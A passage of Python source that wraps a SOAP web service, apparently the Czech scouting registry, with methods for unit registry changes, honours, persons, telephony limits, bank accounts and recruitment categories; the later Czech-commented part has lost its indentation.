        return self._client.service.RegistryUpdateClose({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
    # Send a change request in the organizational-unit registry to the Czech Ministry of the Interior (MV ČR).
    def RegistryUpdateSend(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
        return self._client.service.RegistryUpdateSend({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
    # Send the messages of organizational-unit registry change requests.
    def RegistryUpdateSendMessage(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
        return self._client.service.RegistryUpdateSendMessage({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
    # Revoke the submission of a unit's economic statement (reopen it for editing).
    def StatementUpdateOpen(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
        return self._client.service.StatementUpdateOpen({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
    # Download the file with the scan of the honour proposal.
    def PersonHonourDownloadScan(self, ID_Login, ID):
        return self._client.service.PersonHonourDownloadScan({"ID_Login": ID_Login, "ID": ID})
    # Load the list of honours that the person is allowed to grant.
    def HonourAllGrant(self, ID_Login, ID, DisplayName=None):
        return self._client.service.HonourAllGrant({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
    # Load the list of honours.
    def HonourAll(self, ID_Login, ID, IsActive, DisplayName=None):
        return self._client.service.HonourAll({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "DisplayName": DisplayName})
    # Load the detail of an honour.
    def HonourDetail(self, ID_Login, ID):
        return self._client.service.HonourDetail({"ID_Login": ID_Login, "ID": ID})
    # Load the image of an honour.
    def HonourImage(self, ID_Login, ID):
        return self._client.service.HonourImage({"ID_Login": ID_Login, "ID": ID})
    # Create an honour.
    def HonourInsert(self, ID_Login, ID, IsActive, MaxCount, DisplayName=None, Description=None, FileName=None, ImageContent=None, StateUrl=None, DescriptionUrl=None):
        return self._client.service.HonourInsert({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "MaxCount": MaxCount, "DisplayName": DisplayName, "Description": Description, "FileName": FileName, "ImageContent": ImageContent, "StateUrl": StateUrl, "DescriptionUrl": DescriptionUrl})
    # Load the list of units associated with an honour.
    def HonourUnitAll(self, ID_Login, ID_Honour, ID_Unit):
        return self._client.service.HonourUnitAll({"ID_Login": ID_Login, "ID_Honour": ID_Honour, "ID_Unit": ID_Unit})
    # Delete a unit in which the honour is granted.
    def HonourUnitDelete(self, ID_Login, ID):
        return self._client.service.HonourUnitDelete({"ID_Login": ID_Login, "ID": ID})
    # Create a unit in which the honour is granted.
    def HonourUnitInsert(self, ID_Login, ID_Honour, ID_Unit):
        return self._client.service.HonourUnitInsert({"ID_Login": ID_Login, "ID_Honour": ID_Honour, "ID_Unit": ID_Unit})
    # Update an honour.
    def HonourUpdate(self, ID_Login, ID, IsActive, MaxCount, DisplayName=None, Description=None, FileName=None, ImageContent=None, StateUrl=None, DescriptionUrl=None):
        return self._client.service.HonourUpdate({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "MaxCount": MaxCount, "DisplayName": DisplayName, "Description": Description, "FileName": FileName, "ImageContent": ImageContent, "StateUrl": StateUrl, "DescriptionUrl": DescriptionUrl})
    # Search adult persons (for jobs agenda).
    def PersonAllJobs(self, ID_Login, ID, FirstName=None, LastName=None, NickName=None):
        return self._client.service.PersonAllJobs({"ID_Login": ID_Login, "ID": ID, "FirstName": FirstName, "LastName": LastName, "NickName": NickName})
    # Load the list of jubilarians (persons with upcoming anniversaries).
    def PersonAllJubilant(self, ID_Login, Settings=None):
        return self._client.service.PersonAllJubilant({"ID_Login": ID_Login, "Settings": Settings})
    # Load the list of a person's honours.
    def PersonHonourAll(self, IsValid, ID_Login, ID_Person, ID_Honour, YearValidFrom, PersonDisplayName=None, LetterNumber=None, Suggester=None):
        return self._client.service.PersonHonourAll({"IsValid": IsValid, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "YearValidFrom": YearValidFrom, "PersonDisplayName": PersonDisplayName, "LetterNumber": LetterNumber, "Suggester": Suggester})
    # Load the list of a person's honours (scoped to the logged-in user).
    def PersonHonourAllLogin(self, IsValid, ID_Login, ID_Person, ID_Honour, YearValidFrom, PersonDisplayName=None, LetterNumber=None, Suggester=None):
        return self._client.service.PersonHonourAllLogin({"IsValid": IsValid, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "YearValidFrom": YearValidFrom, "PersonDisplayName": PersonDisplayName, "LetterNumber": LetterNumber, "Suggester": Suggester})
    # Load the list of a person's honours (per-person view, optionally with history).
    def PersonHonourAllPerson(self, ShowHistory, ID_Login, ID_Person, ID_Honour, IsValid):
        return self._client.service.PersonHonourAllPerson({"ShowHistory": ShowHistory, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "IsValid": IsValid})
    # Delete a person's honour.
    def PersonHonourDelete(self, ID_Login, ID):
        return self._client.service.PersonHonourDelete({"ID_Login": ID_Login, "ID": ID})
    # Load the detail of a person's honour.
    def PersonHonourDetail(self, ID_Login, ID):
        return self._client.service.PersonHonourDetail({"ID_Login": ID_Login, "ID": ID})
    # Create a person's honour.
    def PersonHonourInsert(self, ID_Login, ID_Person, ID_Honour, ValidFrom, ValidTo, ID_PersonSuggester, ID_UnitSuggester, InMemorian, Suggester=None, LetterNumber=None, Reason=None, FileName=None, FileContent=None, Person=None):
        return self._client.service.PersonHonourInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSuggester": ID_PersonSuggester, "ID_UnitSuggester": ID_UnitSuggester, "InMemorian": InMemorian, "Suggester": Suggester, "LetterNumber": LetterNumber, "Reason": Reason, "FileName": FileName, "FileContent": FileContent, "Person": Person})
    # Update a person's honour.
    def PersonHonourUpdate(self, ID_Login, ID, ID_Person, ID_Honour, ValidFrom, ValidTo, ID_PersonSuggester, ID_UnitSuggester, InMemorian, Person=None, Honour=None, Suggester=None, SuggesterDisplayName=None, LetterNumber=None, Reason=None, FileName=None, FileContent=None, IdentificationCode=None, IdentificationCodeSuggester=None):
        return self._client.service.PersonHonourUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSuggester": ID_PersonSuggester, "ID_UnitSuggester": ID_UnitSuggester, "InMemorian": InMemorian, "Person": Person, "Honour": Honour, "Suggester": Suggester, "SuggesterDisplayName": SuggesterDisplayName, "LetterNumber": LetterNumber, "Reason": Reason, "FileName": FileName, "FileContent": FileContent, "IdentificationCode": IdentificationCode, "IdentificationCodeSuggester": IdentificationCodeSuggester})
    # Edit the type of a person.
    def PersonUpdatePersonType(self, ID_Login, ID, ID_PersonType=None):
        return self._client.service.PersonUpdatePersonType({"ID_Login": ID_Login, "ID": ID, "ID_PersonType": ID_PersonType})
    # Load the list of registration services.
    def RegistrationServiceAll(self, ID_Login, ID_UnitRegistration, ID_RegistrationServiceType=None):
        return self._client.service.RegistrationServiceAll({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "ID_RegistrationServiceType": ID_RegistrationServiceType})
    # Create a registration service.  (NOTE: "Ammount" is the upstream API's own spelling — do not "fix" it.)
    def RegistrationServiceInsert(self, ID_Login, ID_UnitRegistration, Ammount, ID_VatRate, ID_RegistrationServiceType=None):
        return self._client.service.RegistrationServiceInsert({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "Ammount": Ammount, "ID_VatRate": ID_VatRate, "ID_RegistrationServiceType": ID_RegistrationServiceType})
    # Load the list of registration service types.
    def RegistrationServiceTypeAll(self, ID_Login, DisplayName=None):
        return self._client.service.RegistrationServiceTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
    # Load the list of registrations of the parent unit.
    def UnitRegistrationAllParent(self, ID_Login, ID_Unit):
        return self._client.service.UnitRegistrationAllParent({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
    # Set sending of the parents' journal to members of a unit.
    def UnitUpdateJournalParent(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
        return self._client.service.UnitUpdateJournalParent({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": 
DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
    # Load the list of unit officials without a filled-in contact of the given type.
    def PersonAllUnitRegistrationMistake(self, ID_Login, ID_Unit, ID_ContactType=None):
        return self._client.service.PersonAllUnitRegistrationMistake({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_ContactType": ID_ContactType})
    # Load summary information about the scout directory.
    def PersonCatalogSummary(self, ID_Login):
        return self._client.service.PersonCatalogSummary({"ID_Login": ID_Login})
    # Load the list of persons for the scout directory, filtered by name, city, registration number, unit and contacts.
    def PersonAllCatalog(self, ID_Login, RegistrationNumberStartWith, ID_OfferType, Name=None, City=None, RegistrationNumber=None, Unit=None, Phone=None, Email=None):
        return self._client.service.PersonAllCatalog({"ID_Login": ID_Login, "RegistrationNumberStartWith": RegistrationNumberStartWith, "ID_OfferType": ID_OfferType, "Name": Name, "City": City, "RegistrationNumber": RegistrationNumber, "Unit": Unit, "Phone": Phone, "Email": Email})
    # Load the STS (telephony) number limits for a person.
    def PersonDetailTelephonyLimit(self, ID_Login, ID):
        return self._client.service.PersonDetailTelephonyLimit({"ID_Login": ID_Login, "ID": ID})
    # Edit the STS (telephony) number limits of a person.
    def PersonUpdateTelephonyLimit(self, ID_Login, ID, TelephonyLimit, DataLimit):
        return self._client.service.PersonUpdateTelephonyLimit({"ID_Login": ID_Login, "ID": ID, "TelephonyLimit": TelephonyLimit, "DataLimit": DataLimit})
    # Show the detail of a unit's STS (telephony) number limits.
    def UnitDetailTelephonyLimit(self, ID_Login, ID):
        return self._client.service.UnitDetailTelephonyLimit({"ID_Login": ID_Login, "ID": ID})
    # Load the list of unit types with telephony number limits.
    def UnitTypeAllLimit(self, ID_Login, DisplayName=None):
        return self._client.service.UnitTypeAllLimit({"ID_Login": ID_Login, "DisplayName": DisplayName})
    # Update a unit type.
    def UnitTypeUpdate(self, ID_Login, Level, ContainsMembers, FreeAttachments, CommissionCount, CommissionDeadline, CallLimit, DataLimit, ID=None, DisplayName=None, Note=None, Birdos=None, ID_Instance=None):
        return self._client.service.UnitTypeUpdate({"ID_Login": ID_Login, "Level": Level, "ContainsMembers": ContainsMembers, "FreeAttachments": FreeAttachments, "CommissionCount": CommissionCount, "CommissionDeadline": CommissionDeadline, "CallLimit": CallLimit, "DataLimit": DataLimit, "ID": ID, "DisplayName": DisplayName, "Note": Note, "Birdos": Birdos, "ID_Instance": ID_Instance})
    # Update a unit's STS (telephony) number limits.
    def UnitUpdateTelephonyLimit(self, ID_Login, ID, TelephonyLimit, DataLimit, DefaultCallLimit, DefaultDataLimit):
        return self._client.service.UnitUpdateTelephonyLimit({"ID_Login": ID_Login, "ID": ID, "TelephonyLimit": TelephonyLimit, "DataLimit": DataLimit, "DefaultCallLimit": DefaultCallLimit, "DefaultDataLimit": DefaultDataLimit})
    # Load the list of persons matching an identification code (exact or by prefix).
    def PersonAllIdentificationCode(self, ID_Login, IdentificationCode=None, IdentificationCodeStartsWith=None):
        return self._client.service.PersonAllIdentificationCode({"ID_Login": ID_Login, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith})
    # Search in the organizational-unit registry (basic search).
    def UnitAllRegistryBasic(self, ID_Login, ID_Application, IsValid, Search=None):
        return self._client.service.UnitAllRegistryBasic({"ID_Login": ID_Login, "ID_Application": ID_Application, "IsValid": IsValid, "Search": Search})
    # Edit the basic address data of a person (home and postal address).
    def PersonUpdateAddress(self, ID_Login, ID, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None):
        return self._client.service.PersonUpdateAddress({"ID_Login": ID_Login, "ID": ID, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState})
    # Edit the basic personal data of a person (name, birthday, address).
    def PersonUpdateBasic(self, ID_Login, ID, Birthday, YearFrom, ID_Sex=None, FirstName=None, LastName=None, NickName=None, MaidenName=None, Street=None, City=None, Postcode=None, State=None):
        return self._client.service.PersonUpdateBasic({"ID_Login": ID_Login, "ID": ID, "Birthday": Birthday, "YearFrom": YearFrom, "ID_Sex": ID_Sex, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "MaidenName": MaidenName, "Street": Street, "City": City, "Postcode": Postcode, "State": State})
# Hledání osob pro účastníky tábora
def PersonAllEventCamp(self, ID_Login, ID_EventCamp, ID, DisplayName=None, IdentificationCode=None, IdentificationCodeStartsWith=None):
return self._client.service.PersonAllEventCamp({"ID_Login": ID_Login, "ID_EventCamp": ID_EventCamp, "ID": ID, "DisplayName": DisplayName, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith})
# Hledání osob pro hromadné přidání účastníků tábora
def PersonAllEventCampMulti(self, ID_Login, ID_EventCamp):
return self._client.service.PersonAllEventCampMulti({"ID_Login": ID_Login, "ID_EventCamp": ID_EventCamp})
# Načíst seznam středisek, pro založení tábora
def UnitAllCamp(self, ID_Login):
return self._client.service.UnitAllCamp({"ID_Login": ID_Login})
# Hledání osob pro účast na sněmu
def PersonAllUstredi(self, ID_Login, ID_EventCongress, ID, DisplayName=None):
return self._client.service.PersonAllUstredi({"ID_Login": ID_Login, "ID_EventCongress": ID_EventCongress, "ID": ID, "DisplayName": DisplayName})
# Hledání dospělých osob
def PersonAllPublic(self, ID_Login, ID, FirstName=None, LastName=None, NickName=None):
return self._client.service.PersonAllPublic({"ID_Login": ID_Login, "ID": ID, "FirstName": FirstName, "LastName": LastName, "NickName": NickName})
# Načíst seznam účtů
def AccountAll(self, ID_Login, ID_Application, ID_Unit, ID_Bank, ShowHistory, IsValid):
return self._client.service.AccountAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Bank": ID_Bank, "ShowHistory": ShowHistory, "IsValid": IsValid})
# Smazat účet
def AccountDelete(self, ID_Login, ID):
return self._client.service.AccountDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail účtu
def AccountDetail(self, ID_Login, ID):
return self._client.service.AccountDetail({"ID_Login": ID_Login, "ID": ID})
# Založit účet
def AccountInsert(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
return self._client.service.AccountInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidTo": ValidTo, "ID_Bank": ID_Bank, "IsMain": IsMain, "DisplayName": DisplayName, "Unit": Unit, "Bank": Bank, "AccountPrefix": AccountPrefix, "AccountNumber": AccountNumber, "Street": Street, "City": City, "Postcode": Postcode, "Note": Note})
# Upravit účet
def AccountUpdate(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
return self._client.service.AccountUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidTo": ValidTo, "ID_Bank": ID_Bank, "IsMain": IsMain, "DisplayName": DisplayName, "Unit": Unit, "Bank": Bank, "AccountPrefix": AccountPrefix, "AccountNumber": AccountNumber, "Street": Street, "City": City, "Postcode": Postcode, "Note": Note})
# Načíst seznam náborových kategorií
def AdvertisingCategoryAll(self, ID_Login, ID_Application, ID_Unit, ID_MeetingDate, ID_Sex=None):
return self._client.service.AdvertisingCategoryAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_MeetingDate": ID_MeetingDate, "ID_Sex": ID_Sex})
# Smazat náborovou kategorii
def AdvertisingCategoryDelete(self, ID_Login, ID):
return self._client.service.AdvertisingCategoryDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail náborové kategorie
def AdvertisingCategoryDetail(self, ID_Login, ID):
return self._client.service.AdvertisingCategoryDetail({"ID_Login": ID_Login, "ID": ID})
# Založit náborovou kategorii
def AdvertisingCategoryInsert(self, ID_Login, ID, ID_Unit, AgeFrom, AgeTo, ID_MeetingDate, Unit=None, ID_Sex=None, Sex=None, MeetingDate=None, Note=None):
return self._client.service.AdvertisingCategoryInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "AgeFrom": AgeFrom, "AgeTo": AgeTo, "ID_MeetingDate": ID_MeetingDate, "Unit": Unit, "ID_Sex": ID_Sex, "Sex": Sex, "MeetingDate": MeetingDate, "Note": Note})
# Upravit náborovou kategorii
def AdvertisingCategoryUpdate(self, ID_Login, ID, ID_Unit, AgeFrom, AgeTo, ID_MeetingDate, Unit=None, ID_Sex=None, Sex=None, MeetingDate=None, Note=None):
return self._client.service.AdvertisingCategoryUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "AgeFrom": AgeFrom, "AgeTo": AgeTo, "ID_MeetingDate": ID_MeetingDate, "Unit": Unit, "ID_Sex": ID_Sex, "Sex": Sex, "MeetingDate": MeetingDate, "Note": Note})
# Načíst náborové informace
def AdvertisingDetail(self, ID_Login, ID_Application, ID_Unit):
return self._client.service.AdvertisingDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit})
# Velká přehledová tabulka náborových údajů
def AdvertisingSummary(self, ID_Login, ID_Application, ID_Unit, IncludeChildUnits, ID_Realty, Distance, GpsLatitude, GpsLongitude):
